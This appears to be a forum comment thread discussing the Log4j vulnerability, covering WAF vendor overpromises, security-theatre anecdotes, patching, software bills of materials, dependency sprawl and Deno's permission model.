Sadly every WAF vendor is falling over themselves to claim otherwise. I've already had arguments with senior leadership suggesting there's no need to worry about patching because multiple vendors have promised their solutions are better.
The further I get into security the more embarrassed I am for some of the offerings.
I am half convinced you can build a successful cyber security business putting a box in a network that does absolutely nothing. I think there's a requirement to at least show a blinking led and have a, not necessarily patched, cable plugged in. But that's about it.
My thinking is, that if you show a cool enough interface (not connected to the box), with lots of widgets and stats, and they don't detect a hack in the time span of 2 years, you can probably walk away with pretty penny! If they do get hacked, just pretend you technically _did_ see the alert, but a junior employee on your side failed to act on it. Sack them, and then re-hire them later. They are the 'fall' person whose job is basically getting fired. Give your customer a discount and try to stay on for 2 more years!
> Case in point: the Air Gap. Levy set up a website showcasing a magic amulet of his own creation. Like many cyber defences, his piece of hardware promised to defend against all known and unknown viruses, and stop zero day exploits. His product? An empty box with a blue blinking light on it. Levy had to take his website offline when he started getting sales enquiries by email.
That's pretty much what I've experienced myself at one point.
We had a client sending extremely sensitive data around by email. One day I was told we should all relax, the problem had been solved. You see he'd been sold a PGP hardware appliance.
As the person running the mail system, I could attest that mail wasn't flowing through it. It was literally in a rack. I don't even think it was given an IP address on their actual network. Multiple auditors came in to review the safety of the sensitive data that we had. They were all shown pictures of the rack with the PGP appliance in it, and that always was considered sufficient.
This reminds me a lot of audiophile woo as well. It seems like this sort of grift could be applied to just about anything where the technology is indistinguishable from magic.
I once saw a spray for CDs that would "absorb stray laser light" or something like that. The bit that gets me is that according to the instructions you're supposed to spray it only on the label side of the disc.
The devil is in the details. As a random example, you might have a process where all the pre-WAF requests (or explicitly the requests blocked by WAF) get forwarded to a log analysis system that itself uses log4j and is vulnerable, allowing the attacker to gain RCE in your monitoring infrastructure.
Also, blocking any request containing "{" is tricky - like, that's so generic that it's time-consuming to verify that it won't break anything, and it's very likely that JSON is used somewhere in that application traffic, so you can't simply do that.
No. The stakeholders are busy patching their shit. Pulling folks into meetings shouldn't be the priority when teams around the world in virtually every tech organizations are in firefighting mode.
This type of a call would likely be focused on assessing current state at that point.
Work in one of the largest financial org in the world as a Java dev for critical system (albeit not internet facing), learned of this just now on this thread...
Edit: upon checking, we're safe, it doesn't impact log4j1, only the second version. We're not cowboys using versions as young as 2012 lol.
I'm sure many folks here spent their Friday, Saturday, and possibly even Sunday patching, and won't speak up in case their profile connects to their company.
Friday mid-afternoon a Google search for the exploit showed there were many websites in several languages giving instruction on how to exploit the vulnerability. This is hitting hard and fast.
It was on the news in my country. There have been several notable ransomware attacks in the last few years, it's become an issue for a country and government that's gone all in on digital.
No, they are managing the teams patching things and helping with prioritization.
If the stakeholders participating in the call on Monday are not the people working on patching, managing, or prioritizing, then having the call earlier than that is pointless, because those stakeholders are too removed from the situation, and getting that information will detract from getting work done.
It's pretty simple really, having a status or coordination call while the work is being done is roughly analogous to a photo-op by a politician during an emergency. It looks good for the voters, but it takes away resources from the folks who are actually doing the work.
> We have established a JCDC senior leadership group to coordinate collective action and ensure shared visibility into both the prevalence of this vulnerability and threat activity
I recall some US gov agency, possibly the IRS of all things, that would only accept forms being submitted during US working hours. Because the computers also need time off I guess?
In some cases I know (with smaller orgs) it happens because someone put a requirement in that they need to react to incidents with the service within X hours, but didn't provide the budget for the employees or external service needed to have that 24/7.
I've heard of similar things being done for ADA compliance. Something about requiring a phone line to be up at all the same times as the website so instead of a 24/7 call center you just turn the site off.
This is pretty awful. Seems easy to fuzz every input form and API param to see which websites are vulnerable just by seeing which sites get a response. Once a site is found to be vulnerable, a malicious actor can try to funnel all logs to an external server, add a remote shell, and potentially scan the production network of whatever was running log4j. Once in the internal network, they can again scan for log4j exploits. Too many groups blanket whitelist cloud IPs like AWS lambda. Seems like there will be a cascade of experian-level data leaks coming. Even if things are somewhat locked down we've seen time and time again, there's internal sprawl where access to an internal bucket or git repo, or an escalation in the CI/CD pipelines leads to full access, then data dumps/leaks.
I’m sure this is the only community that might pay attention to a software BOM as mentioned in the article, but this is a great idea and makes a lot of sense (to me as a consumer at least).
Developers are relying more and more on automated scanners and the likes to manage this. Your modern python or javaScript stack just has way too many packages and they change daily. Just look at your dependency lockfile balloon when a random dependency updates a point and brings in a few more packages. It’s really a horrible thing.
I’d like to say the scanners were fast but not fast enough because the first wave of attacks was nearly instant. This was definitely a nightmare scenario where a simple unauthenticated GET could pull in a kit that was already live and ready to go.
I don't think anyone in the Java community is surprised to find they have a dependency on Log4j. It's one of those libraries used so widely that it's practically stdlib.
In the production of electronic things I've been pointing out that software needs to be on the BOM for other reasons. It is so often overlooked and considered zero cost even though companies pay people to develop it.
Making people look at a BOM would also discourage the mess that is npm.
Most systems use package management now; npm is only the poster child.
Reviewing a stack of BOMs is going to be a challenge for any organization. Say your production Linux has 1000 packages. Each of those might have hundreds or thousands of deps in varying versions, in their respective package managers (BOMs).
Business needs to step up its process game. How are BOMS (dep lists) reviewed? Do we expect zero CVEs? How do you filter out false positives, or irrelevant ones? Do you dump everything with that dep or help the maintainer fix it? Many questions.
We do something along this axis with our products. We have to be able to provide B2B software that will be stable on timelines measured in half-decades (per contractual requirements), so the specific vendors we decide to depend upon are a huge part of our decision making process. I will happily admit we probably wrote a little bit too much stuff in-house, but the number of clear wins easily outweighs the "no DIY allowed" concerns.
Getting us to vendor out something like logging/tracing/telemetry would take an act of god at this point. We explicitly spent a week ripping out Microsoft's byzantine logging from AspNetCore in favor of something we could trust and understand. Our entire logging framework now lives in 1 class file and consists of maybe 30 useful lines of source code. None of them have the capability to reach out to a remote host, download a DLL and then execute it in the current context. This sort of problem we are seeing with Log4j today is precisely the sort of experience we hope to avoid by doing a lot of our tooling in-house.
I think those who parroted "don't reinvent the wheel" over and over like it's some doomsday cult should accept some shame for the situation many developer ecosystems find themselves in today.
The french announcement mentions this:
"In general, it seems that the use of a Java runtime environment in version 8u121 or later makes it possible to guard against the main attack vector mentioned by the researchers behind the discovery."
As has been commented several times on other threads here on HN, a new enough Java only protects against one kind of exploit (directly loading arbitrary bytecode) but not others (serialization tricks to execute arbitrary function calls, or data exfiltration).
I was just digging into Cloud Native Buildpacks (buildpacks.io) as an alternative to Dockerfiles yesterday and realised that they actually have SBOM generation built into them for popular languages which is a really nice easy security infrastructure upgrade for everyone using them.
Spring Boot apps aren't affected by this unless you switched logging frameworks. Nor any JBoss frameworks. How many people actually use Log4j2? It's probably in 4th or 5th place among Java logging frameworks, and likely still has less uptake than the original Log4j.
There's a lot of talk now about a number of things including web application firewalls and how we must fund open source and I hope something good comes out of it.
However, the thing that I wonder is why we still are in a position where every single application and every single dependency can attempt to load dlls (ref npm hacks lately) or reach out to the network?
Why is Deno the only one who seems to have a good solution for this, and why doesn't Deno have more traction?
I know one can do a lot more using outbound firewalls and selinux but after seeing how brilliantly Deno solves this I wonder why not every program lets me do this.
The idea of having different declarative security realms is fine but it's not what the Java Security Manager is.
The Java Security Manager is an API that allows to intercept and run codes, so devs use it as a Trojan Horse to patch code instead of fixing the root of the issue.
Deno solves this by making you specify on the command line or in a config file what an application should have access to, for instance for a simple web application you can specify that it only has read acesss to one folder of static files, write access to the log folder and can only connect to the postgres server. It is also very simple, see:
As for the first part, I'm in the lucky position where nobody can just rewrite everything to todays flavor of js, but where we can decide in the team to test out new technology when we have a chance to, for example on a new small project. There's another guy on the team that is enthusiastic about it too and I guess he'll throw together a demo soon, then we'll discuss it.
Thanks for your time. I am about to start a new personal project and your post, combined with some curiosity, is all I needed to hear. I've reached a point where doing the same thing with the same tech is making me feel uneasy.
That said: What I have seen seems extremely interesting, both the audited standard library and the permission model, the built in support for TypeScript, single binary runtime and the avoidance of a single package repo.
Good luck with your next personal project. I guess now might be a perfect time to invest in learning Deno. It might not take of, but if it doesn't it will probably make me a little sad when I realize it, and I am a Java man (although I enjoy a number of other languages as well).
*are you using ElasticSearch, flink, spark, prest,…etc. do they read in user data supplied by your front end. Could this user data end up being logged intentionally or part of an error log output.
If so, you might be vulnerable and should update those systems.
It doesn’t matter. An nginx web server logging an odd user agent, elasticsearch picks it up. And then, due to some error triggered by the attacker, the content of the webserver log line gets logged on the ES side (for example if it violates a constraint). Frontend bypassed, attack owns ES. I’ve spent my weekend celebrating that I don’t have Java software in a stack that I’m responsible for right now - and feeling sorry for my ex-colleagues that do.
Edit: I haven’t tested or checked whether ES is vulnerable or not - but given the severity of this issue I’d default to the pessimistic stance of assuming it is, until proven otherwise.
As a frontend dev shouldn't you worry about your clients, rather than the boundaries of your organisation ? Harass whomever is putting the log4j dependency in the backend until they patch, don't expect them to know by default.
I'm seeing on 7.15, logstash and elasticsearch both ship log4j in the vulnerable range, but in my case, I'm running a new enough java that it shouldn't be an issue.
As has been commented several times on other threads here on HN, a new enough Java only protects against one kind of exploit (directly loading arbitrary bytecode) but not others (serialization tricks to execute arbitrary function calls, or data exfiltration).